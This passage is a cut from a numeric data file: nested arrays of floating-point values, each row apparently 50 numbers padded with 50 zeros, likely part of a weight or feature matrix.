-3.03089, 0.365761, -0.0930378, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0679461, -0.195916, 0.16952, -0.246394, 1.0181, 0.12309, -0.360755, -0.0468298, 0.00336101, 0.0197748, -0.320182, -0.216156, -0.100056, -0.0789411, -1.53699, 0.0175842, 0.0287724, -0.309856, 0.24331, 0.0813444, -0.505721, 0.320795, 0.17193, 0.16807, 0.203999, -0.00420966, -0.0782321, 0.0302612, -0.418631, -0.0220547, 0.0871929, -0.492828, 0.0349153, -0.338563, -0.00155861, 0.862777, -0.292731, -0.0421078, -0.148815, 0.07596, 0.127954, -0.300573, -0.085767, 0.32272, 0.091759, 0.0657804, 0.391725, -0.120698, -0.199395, -0.05246, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.218528, 0.0963922, 0.269749, -0.041633, 0.809256, 0.269737, -0.313619, -0.196264, -0.145953, -0.0746597, -0.137048, -0.228837, 0.15598, -0.250702, 0.420915, 0.287591, 0.161199, 0.019773, -0.131894, 0.423508, -0.185774, 0.285834, 0.163367, 0.12844, -0.0518864, -0.105136, 0.0131903, -0.13791, -0.0311046, 0.124779, 0.129509, 0.141044, -0.0205755, -0.160281, 0.0570478, -0.268819, -0.224209, 0.0740425, -0.126724, 0.0294541, 0.0347832, 0.0618416, -0.00632139, 0.296443, -0.0600648, 0.016263, 0.380712, -0.0640574, -0.0622073, 0.0971152, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0436474, -0.0298087, -0.14988, -0.113116, 0.0848855, 0.082643, -1.93417, -0.0301826, 0.110709, 0.167787, -0.307157, -0.39557, 0.0301285, 0.10357, -11.0484, -0.0342867, -0.11412, -0.213341, 0.977588, -0.0518196, -0.235971, -0.0459661, 0.506094, -0.0184792, -0.337622, -0.324197, 0.175483, 0.0743243, -0.0523952, -3.14567, -0.128594, -0.120705, -0.0305571, 0.116315, -0.0628323, 0.658526, -0.0923211, -0.0382784, 0.0118329, 0.0348346, -0.357506, -1.03295, -0.0290241, 0.0732027, -0.212804, -0.0142649, -0.102122, 0.0304184, -0.715536, 0.436484, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.68243, -0.17072, -0.319248, 0.118979, 1.96849, 0.409732, -3.36174, 0.0643817, -6.66286, -0.514641, 0.296831, 0.220771, -1.85411, 0.203729, 1.33806, 0.522016, -0.020273, 0.274436, 0.932702, 0.597552, -0.62165, -0.0199416, -0.141941, 0.579189, 0.867244, 0.716547, 0.25847, -0.0993358, -0.498766, -0.265733, -0.90761, -0.776178, -0.323001, -1.30278, 1.08366, -2.4701, -0.277873, -6.48003, -1.66253, 0.129899, 0.395711, 0.543235, 0.46578, 2.22622, -0.0482305, -0.0865136, 0.485549, 1.08002, 0.00859485, 0.350852, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.13921, 0.179277, -0.294366, -0.00802601, -4.32188, 0.0587101, -0.486855, -0.0210261, -0.14786, 0.264653, -0.342642, 0.00536665, -0.171982, -0.0487724, -0.0862592, 0.026717, -0.0798149, 0.0878861, -0.0984905, 0.0659401, -0.00298882, -0.0521552, -0.31863, 0.0418259, 0.602772, -0.0336505, -0.194111, 0.0918568, -0.0199109, -0.0475386, 0.114137, 0.274512, -0.0020315, 0.136451, -0.0403213, -0.944392, -0.0408341, -0.182266, -0.42663, 0.0831194, 0.162978, -0.0348014, 0.0523761, 0.294997, -2.99867, 0.0331841, 0.0294317, -0.0724005, -0.143845, -4.98435, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00332703, 0.334581, -0.0439898, 0.0167441, 0.117819, 0.0702821, 0.629481, -0.0337133, 0.034801, 0.079667, -0.0319666, 0.278502, -0.0232784, -0.044806, -0.0591184, -0.0423848, -0.0409006, 0.0678595, 0.076632, 0.314002, 0.0112597, 0.105288, -0.0169719, -0.0264637, -0.0816537, 0.0382217, 0.0135921, -0.151093, 0.0370202, 0.029789, -0.123578, -0.25147, -0.0420174, -0.270411, 0.0712157, 0.213186, 0.0014644, -0.131762, -0.101606, -0.00893192, 0.00393341, 0.0756914, -0.196468, -0.0144556, 0.0146362, 0.0565129, 0.141059, -0.0310966, -0.000726053, -0.0896467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0433162, 1.58955, -0.667105, -0.091773, 1.13252, -0.77035, 0.0208934, 0.709856, -0.117233, 0.261234, -0.020898, -0.978, -0.139766, 0.462314, -0.275348, -0.202163, -0.0858469, -2.39986, -0.0461281, 0.385406, -7.7382e-05, -0.0665704, 0.52345, -0.162508, 0.53821, 0.959434, -0.637208, 0.309124, 0.104505, 0.042557, 0.609722, -0.964998, -0.44457, -0.659763, 0.621852, 0.405847, -0.348235, 0.0132588, -0.440028, -1.24403, -0.0842776, 0.84972, -0.0538346, 1.20414, 0.131087, 0.133048, -3.22756, -0.328796, 0.00782389, -0.201408, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.5523, -0.602873, 0.597125, -1.00441, -0.257599, -0.91655, -2.13973, 0.102161, 0.270494, 0.347687, -0.121125, -3.94878, -8.89872, 0.389165, 0.382029, -0.251777, -0.100012, 0.109148, 0.332837, 0.70738, -0.323896, 0.477587, -8.80549, -1.54642, 0.595579, 0.41861, 1.04418, -1.07095, -6.59843, -0.309844, 0.0171748, 1.35858, -0.796002, -1.77651, -5.69002, 0.859866, -1.81583, 0.0206551, -0.60633, -1.4828, -0.137665, -1.15438, 1.63555, 0.444153, -0.309471, -0.301987, 2.01048, -0.761288, -0.102032, 0.200867, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.000892677, -0.0987551, -0.0635048, 0.00899302, -0.172508, -0.026062, -0.190673, -0.0182574, -0.0198497, -0.0173256, -0.0405101, -0.545256, -0.100293, 0.00328637, 0.0400577, -0.139615, 0.0141782, -0.109145, 0.111689, 0.135806, -0.0296077, 0.0230913, 0.0610583, -0.103507, 0.103383, -0.738322, 0.0228774, -0.0614437, -0.00484427, -0.0142132, 0.0676433, -0.0783575, 0.0214801, 0.109481, 0.0395514, -0.580651, -0.0621782, -0.0225799, -0.0587909, 0.0285735, 0.0437886, 0.0375812, -0.0603999, -0.0651216, -0.095949, 0.0765383, 0.093772, 0.00783948, -0.00268929, -0.0251691, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0632891, -0.110602, -0.0480748, -0.0178147, -0.0833551, -0.05743, -0.750529, -0.0438618, -0.0504125, -0.106762, 0.119024, 0.455624, -0.0106961, 0.00577347, -0.00320729, -0.0614625, 0.0402448, 0.0327475, -0.102614, -0.132129, -0.00990827, -0.00906967, -0.118944, 0.0688663, 0.124913, -0.13933, 0.0696416, 0.0649565, -0.00770107, -0.0236689, 0.282124, -0.00019066, 0.0640069, -0.0603495, 0.0130785, -0.371818, 0.0375105, -0.0412379, 0.0231959, -0.051222, -0.041858, 0.29148, -0.0464367, -0.265376, -0.0195458, 0.0659533, -0.401076, -0.055565, 0.000236368, -0.0866756, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.86537, 1.22957, -1.33339, -0.990793, -4.61914, 0.130496, -0.729716, -0.433011, -0.219488, -0.0248907, 0.0106786, -0.278505, 0.302346, 0.0700928, 0.197389, 0.639315, -0.121222, -1.61772, -0.275718, 0.494009, -0.0197905, 0.000639123, -2.28071, -0.376904, 0.344001, 0.567198, 0.638964, -0.034761, 0.0211639, -1.61883, -0.198462, 1.32542, -0.0661963, -2.80263, -0.0215901, -1.12066, -0.126275, -0.27476, 0.150371, -1.44402, -0.266481, 0.746744, 0.00387438, -4.09873, -0.399614, 0.0669503, -0.720556, 0.0339061, 0.065541, 0.186405, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.979547, 1.07139, 0.784348, -2.78449, 2.48911, -5.83602, -0.313225, -2.78774, 0.668405, -1.18664, -0.383716, -6.67197, -0.455182, -0.636727, -0.647615, -0.0690024, -0.141081, -0.209129, -0.794158, 0.332777, -0.600919, 0.576879, 0.319476, -10.0014, 0.456261, -2.82611, -0.366903, 0.44986, 0.14223, 0.0660273, 0.627272, 3.67585, -0.461515, -0.255719, 0.119046, 0.968955, 0.00816525, -4.73109, -0.460942, -0.00917594, -0.2392, -0.132123, 1.53455, 0.883328, -0.805511, 0.077092, 0.0763631, -8.85894, 0.0887412, -0.41298, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.153644, -0.287349, 0.808311, -0.628978, 0.663088, 0.23185, -0.256736, 0.0352762, 0.222856, 1.18616, -0.566045, -0.0675674, -0.165601, -0.163859, 0.200155, 0.023995, -0.0960529, 0.253796, 0.769675, 0.725459, -0.0855869, -0.244877, 1.19597, -1.6685, 0.253541, 0.188197, 0.397901, 0.460387, -0.0351397, 0.0681529, -0.528977, 0.540457, 0.158271, 0.323115, -0.434301, 1.21686, -0.238481, 0.165752, 0.10242, 0.0873295, -0.0938522, -2.85917, -0.0471219, -0.479273, -0.791096, -0.306436, -0.893522, -0.0318296, -0.0640807, -2.26259, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.531871, 0.440242, -1.63629, -0.0417775, 0.127859, -0.0519937, -1.15597, -0.190037, -0.0934847, 0.275287, 0.00866005, -4.39248, -3.97998, 0.0861073, 0.109046, 0.247382, -0.137702, -0.0222782, -0.266128, -0.304263, -0.00655528, 0.150133, 0.352539, -0.010888, 0.114355, 0.463151, 0.0169575, -0.207989, -0.0483871, 0.154826, 0.248027, -0.18449, -0.0473515, -0.251402, 0.28419, 1.38438, 0.0113555, 0.126817, 0.609463, -0.301245, -0.0413303, -0.663619, -0.701459, 0.0868543, -0.279274, -0.142292, -0.305523, 0.0615831, -0.0132336, 0.0221011, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00230329, 0.148607, -0.128516, -0.00179663, -0.00163784, 0.00534232, -0.214901, 0.00741416, 0.0136522, -0.196705, -0.0119092, 1.15581, 0.015444, 0.0196616, -0.00546345, 0.0637994, -0.027786, -0.0848974, 0.254027, 0.037225, 0.00104256, -0.258186, -0.087472, 0.00112173, 0.149587, 0.0185585, 0.0141074, -0.00217506, 0.00086563, -0.0916727, -0.62379, -0.00689335, -0.134756, -0.00678465, -0.0319778, 0.291578, -0.00228568, -0.00489068, -0.00497504, 0.00940699, -0.166916, -1.06968, 0.022661, -0.116812, -0.0051332, -0.00564019, 0.00395107, 0.00685955, -0.00241078, -0.698923, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0464698, 0.551384, 0.359815, -0.0802145, 0.590648, -0.544443, -0.258539, -0.0757818, -0.100089, 0.10477, -0.0172885, 0.457878, -0.0719607, 0.0177946, -0.0434758, 0.223453, -0.00939962, -0.0417517, 0.062425, 0.139215, 0.0918371, 0.294694, -0.00155919, 0.0686586, 0.235412, 0.300194, 0.117378, 0.101722, 0.0215695, 0.0754137, -0.0372671, -0.14075, -0.0285702, -0.402149, 0.121631, 0.401498, 0.065618, -0.0992043, -0.493367, -0.0647903, 0.162078, 0.468058, -0.116267, 0.280276, 0.0721641, -0.044723, -0.116642, -0.0952337, -0.0464884, -0.0836464, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.08128, -0.137468, -0.12353, -0.125097, 0.00140105, 0.087726, -0.0320484, -0.00170595, -0.0544409, -0.223793, 0.0122243, -0.929621, -1.24647, -0.309245, 0.0474166, -1.32751, -6.433e-05, -0.170624, 0.0211212, 0.0144147, 0.00671299, 0.0526034, -0.23638, -1.46575, 0.0233889, -0.31179, -0.0429232, -0.156514, -0.0309423, 0.0578041, -1.09441, -0.98948, -0.196286, -3.69479, -0.348959, 0.188367, -0.656161, -0.350601, 0.0150148, -0.00113288, -0.0536714, 0.168375, 0.198499, -0.193734, -0.0868963, -0.0675486, -3.21326, -0.0310835, -0.136594, 0.19506, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.989711, 4.07426, 1.8658, -1.90335, -3.88138, -1.00835, 0.0743546, 1.67867, -0.405826, 0.549189, -1.43028, 1.09834, 1.09241, -0.238799, 1.16438, 0.838383, 0.387961, -0.00198516, 0.533524, -1.38739, -0.628068, -0.719694, 1.68559, -0.964383, 1.43471, 2.0574, -0.90539, -0.590972, 0.442365, -0.330477, 2.18317, -0.0747921, -0.0645806, -1.46574, 1.97434, 1.9584, -0.166371, 0.184573, 1.01046, -0.394545, -0.473841, 2.72712, 0.386137, -2.13301, -0.826713, -1.38244, -1.30081, -0.172912, 1.2186, -4.9439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.297066, 0.614013, 0.0177407, 0.0946948, 0.28738, 0.0904941, 0.653066, 0.0230192, -0.0617862, 0.0045406, -0.176717, 0.792746, -0.0490113, -0.0641461, -0.0437274, 0.0526887, 0.0752672, 0.0177165, -0.464038, -0.834514, -0.262235, 0.00675418, 0.321562, -0.126896, 0.0128644, 0.23622, 0.166828, 0.152963, -0.146779, 0.108485, -0.0398573, -0.240074, -0.137627, -0.349488, 0.196025, 0.358787, -0.169672, -0.0818495, 0.173637, -0.0267539, -0.0784468, 0.00424027, -0.281483, 0.470937, 0.0616303, -0.00452246, -0.391235, 0.0678407, -0.0629347, 0.0644863, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.557517, -0.173367, 0.0392317, 0.0217549, -0.108408, 0.0525476, -1.41054, -0.00109867, -0.0286282, 0.0367939, -0.0341302, -0.004493, 0.0693375, -0.00783904, -0.00510357, -0.0439498, -0.050322, -0.0520081, -0.0350051, 0.178303, 0.010006, 0.0199975, -0.0954596, -0.0154273, 0.0857445, -0.105056, -0.113937, -0.146062, 0.0234869, 0.0169509, 0.0983037, 0.00101986, 0.00210366, -3.32019, -0.203053, 0.110608, -0.168485, -0.0609527, 0.0580966, -0.0133487, -0.00244754, 0.118568, -1.70434, -4.30372, -0.0354869, -0.106948, -0.177703, -0.00765853, 0.0131175, 0.0275693, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0204695, 0.0223643, -0.0243812, 0.0146298, -0.0415361, 0.00820518, -0.00892246, 0.031723, 0.00554882, -0.00877494, -0.0548525, 0.0274748, -0.0221081, 0.00906296, -0.0114823, -0.0465796, -0.043575, 0.0199864, -0.0331047, 0.0471855, -0.0046006, -0.0284358, 0.0156292, 0.0207335, 0.0124492, -0.0432942, 0.018417, 0.016235, -0.0274217, -0.0301965, 0.017551, -0.00925177, -0.0156196, -0.0267814, 0.0185272, 0.0358673, -0.00946765, 0.0324075, -0.0584109, -0.0249332, -0.0315923, -0.0184504, -0.0236654, -0.00649219, -0.034787, -0.0222095, 0.010535, 0.00756894, -0.00014684, -0.0362273, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.106109, 1.29134, 1.76848, 0.0430765, -3.86096, -0.163331, 0.133054, -0.237161, -0.29743, -0.470672, -0.222604, 0.135846, 1.2505, 0.424474, -0.299868, 0.362121, -0.147281, -2.40455, 1.10839, -0.694552, 0.158308, -0.0146809, 0.94023, 0.230274, -1.99997, -1.17152, 0.739364, -0.264069, 0.0887211, -0.130809, -0.399161, 2.56588, 0.188564, -0.610672, 0.171534, 0.271985, -0.212644, -4.35062, -0.305392, -0.00750207, -0.0845502, 0.546064, 1.02345, 0.174517, -0.696105, -0.0698052, 0.829527, -0.61017, 0.292604, -0.604097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0247721, 0.0115411, -0.0797831, 0.159416, -4.32132, -1.28512, -0.426018, -0.586032, -0.0628205, -1.27192, 0.0084803, -0.160213, 0.00717192, 0.0129334, -0.0144258, -0.000514333, 0.0461299, -0.0291068, -0.0123271, 0.0619209, -0.266237, -0.0267065, 0.0105504, -0.451933, 0.0154839, -0.238927, -0.0814344, 0.0801853, -0.00908032, 0.00116715, 0.0493173, -0.283162, -0.849688, -2.54529, 0.0257275, -0.0227548, -0.00563317, -0.146518, -0.121448, -2.396, 0.0179936, 0.196952, -0.968114, -0.455727, 0.00459094, -0.0669994, -2.47361, -0.265842, -0.00906243, -0.928452, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.139598, 1.06516, 0.490222, -2.17528, 3.12607, -1.036, -1.3677, -0.155669, -1.36504, -0.0577323, -1.46329, 0.322127, -0.344826, -0.53335, 1.38585, 0.972806, 0.130979, 0.34194, 0.437981, 1.19979, -1.57584, 1.13948, 0.355384, 0.203494, 0.249731, 0.193146, -0.0787124, 0.0893741, -1.13896, 0.295369, 0.189263, -0.14723, -0.212372, -0.428334, 0.233303, -0.910525, -0.970898, -0.4589, -1.75602, -0.53449, 0.664932, 2.32254, -0.981046, 1.99706, -2.2708, 0.0743042, 0.142296, -3.29678, -0.296859, 3.14083, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.825566, -0.699428, -0.326328, -1.77177, 0.277596, 0.55427, 0.812694, 0.0009358, -0.0111042, -0.041698, -0.08064, 0.654729, -0.22405, -0.227632, 0.332717, 0.166856, 0.122917, -0.177598, -2.78342, -0.557288, -1.39633, 0.05714, 0.200463, 0.205907, 0.293394, 0.327247, -0.0336302, -0.0791815, -1.50883, 0.13902, 0.0402293, -1.08505, -0.145548, -0.346729, 0.192204, -0.352005, -0.574401, -0.0986989, 0.0846192, -0.125445, -0.194657, -0.176553, -0.358886, 0.692877, 0.153098, 0.0899646, -0.413342, 0.248388, -0.334103, 0.0739906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.229304, -0.0635595, -0.20567, -0.0351613, 0.0823049, -0.0156062, 0.702336, -0.035735, -0.134542, -0.172913, 0.0817171, -0.00846514, -0.00492361, 0.045652, -0.0190306, 0.161979, 0.0376816, 0.0219864, -0.160011, -0.316523, 0.00366427, 0.0715392, -0.0849684, 0.268497, 0.193233, -0.421774, -0.0202102, 0.136298, 0.00574725, -0.0829131, -0.0409926, -0.208146, 0.0551996, -0.128617, 0.0454432, 0.306461, -0.0103268, -0.0590751, 0.0201689, 0.0207485, 0.113161, 0.0990744, 0.093192, -0.0079823, -0.068022, 0.0670204, -0.0552199, -0.0787001, -0.00727348, -0.0662526, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 